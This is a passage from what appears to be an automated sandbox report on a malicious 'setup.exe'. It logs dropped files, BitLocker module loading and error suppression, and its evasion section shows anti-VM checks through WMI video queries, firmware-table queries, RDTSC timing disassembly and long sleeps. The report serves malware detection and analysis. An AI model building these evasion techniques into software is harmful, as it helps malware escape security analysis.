          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705AAF push ecx; retf 0007h4_2_03705ABA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03703A9B push ebx; retf 4_2_03703ADA
          Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeFile created: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeFile created: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-T64JA.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_setup64.tmpJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
          Query firmware table information (likely to detect VMs)
          Source: C:\Users\user\Desktop\setup.exeSystem information queried: FirmwareTableInformationJump to behavior
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeAPI/Special instruction interceptor: Address: 6BC57C44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BC5F3E1 second address: 6BC5F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BC5F3FD second address: 6BC5F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F1EA54681E5h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F1EA5468270h 0x00000031 rdtsc
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5519Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4310Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\Desktop\setup.exe TID: 7388Thread sleep time: -210000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep count: 5519 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep count: 4310 > 30Jump to behavior
